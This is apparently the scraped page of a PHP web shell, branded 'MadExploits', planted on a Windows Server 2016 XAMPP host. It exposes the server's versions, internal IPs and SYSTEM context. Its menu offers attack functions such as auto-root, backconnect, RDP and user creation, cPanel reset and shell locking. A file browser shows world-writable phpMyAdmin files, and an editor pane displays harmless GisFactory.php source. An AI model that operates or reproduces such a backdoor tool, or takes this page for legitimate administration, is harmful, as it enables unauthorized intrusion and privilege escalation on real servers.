Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
libraries /
classes /
Gis /
[ HOME SHELL ]
Name
Size
Permission
Action
GisFactory.php
1.44
KB
-rw-rw-rw-
GisGeometry.php
12.68
KB
-rw-rw-rw-
GisGeometryCollection.php
12.51
KB
-rw-rw-rw-
GisLineString.php
10.84
KB
-rw-rw-rw-
GisMultiLineString.php
13.79
KB
-rw-rw-rw-
GisMultiPoint.php
12.57
KB
-rw-rw-rw-
GisMultiPolygon.php
19.89
KB
-rw-rw-rw-
GisPoint.php
10.57
KB
-rw-rw-rw-
GisPolygon.php
18.89
KB
-rw-rw-rw-
GisVisualization.php
20.91
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GisFactory.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Contains the factory class that handles the creation of geometric objects * * @package PhpMyAdmin-GIS */ declare(strict_types=1); namespace PhpMyAdmin\Gis; /** * Factory class that handles the creation of geometric objects. * * @package PhpMyAdmin-GIS */ class GisFactory { /** * Returns the singleton instance of geometric class of the given type. * * @param string $type type of the geometric object * * @return GisMultiPolygon|GisPolygon|GisMultiPoint|GisPoint|GisMultiLineString|GisLineString|GisGeometryCollection|false the singleton instance of geometric class of the given type * * @access public * @static */ public static function factory($type) { switch (strtoupper($type)) { case 'MULTIPOLYGON': return GisMultiPolygon::singleton(); case 'POLYGON': return GisPolygon::singleton(); case 'MULTIPOINT': return GisMultiPoint::singleton(); case 'POINT': return GisPoint::singleton(); case 'MULTILINESTRING': return GisMultiLineString::singleton(); case 'LINESTRING': return GisLineString::singleton(); case 'GEOMETRYCOLLECTION': return GisGeometryCollection::singleton(); default: return false; } } }
Close